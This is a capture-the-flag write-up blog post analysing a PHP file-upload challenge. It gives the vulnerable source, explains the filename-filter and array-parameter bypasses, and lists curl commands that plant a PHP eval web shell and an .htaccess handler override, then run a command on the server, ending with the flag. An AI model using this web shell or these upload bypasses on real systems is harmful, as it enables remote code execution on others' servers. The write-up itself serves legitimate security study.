PCAT - EasyGame

Post author: vkkkv
Post link: https://vkkkv.github.io/ctf/wp/pcat-easygame/
Copyright Notice: All articles in this blog are licensed under <span class="exturl" data-url="aHR0cHM6Ly9jcmVhdGl2ZWNvbW1vbnMub3JnL2xpY2Vuc2VzL2J5LW5jLXNhLzQuMC8="> BY-NC-SA unless stating additionally.

Posted on 2026-03-05 In ctf Views: Disqus: Word count in article: 210 Reading time ≈ 1 mins.

Source analysis

<?php
highlight_file(__FILE__);

$upload = 'upload/' . md5("2021" . $_SERVER['REMOTE_ADDR']);
@mkdir($upload);
file_put_contents($upload . '/index.php', '');
var_dump($upload);

if (isset($_POST['file']) && isset($_POST['file'])) {
    if (preg_match('#.+\.ph(p[3457]?|t|tml)$|/#is', $_POST['file'])) {
        die('file error');
    }
    if (preg_match('#\w{2,}|[678]|<\?|/#', $_POST['content'])) {
        die('content error');
    }
    file_put_contents($upload . '/' . $_POST['file'], $_POST['content']);
}

if (isset($_GET['reset'])) {
    @rmdir($upload);
} string(39) "upload/8cecb394a757c7e7a02f7ed43677c303"

The upload path is deterministic and leaked by var_dump($upload).
The filename filter only blocks extensions ending with .php/.phtml variants, so arch.php.wtf passes.
The content check applies preg_match to $_POST['content']; sending content[]= makes it an array and bypasses the intended regex check.
Uploading .htaccess with SetHandler application/x-httpd-php forces Apache to execute the uploaded non-.php file as PHP.

Exploit

# 1) Upload payload to a non-blocked extension
curl -X POST \
  -d "file=arch.php.wtf" \
  -d "content[]=<?php eval(\$_POST['arch']); ?>" \
  http://159.75.177.153:8888/

# 2) Enable PHP handler in the upload directory
curl -X POST \
  -d "file=.htaccess" \
  -d "content[]=SetHandler application/x-httpd-php" \
  http://159.75.177.153:8888/

# 3) Execute command (replace <upload_dir> with leaked value)
curl -X POST \
  -d "arch=system('/readflag');" \
  http://159.75.177.153:8888/upload/8cecb394a757c7e7a02f7ed43677c303/arch.php.wtf

Flag:

flag{46dd5c50-3e80-485e-80f4-f46b5d85f4b8}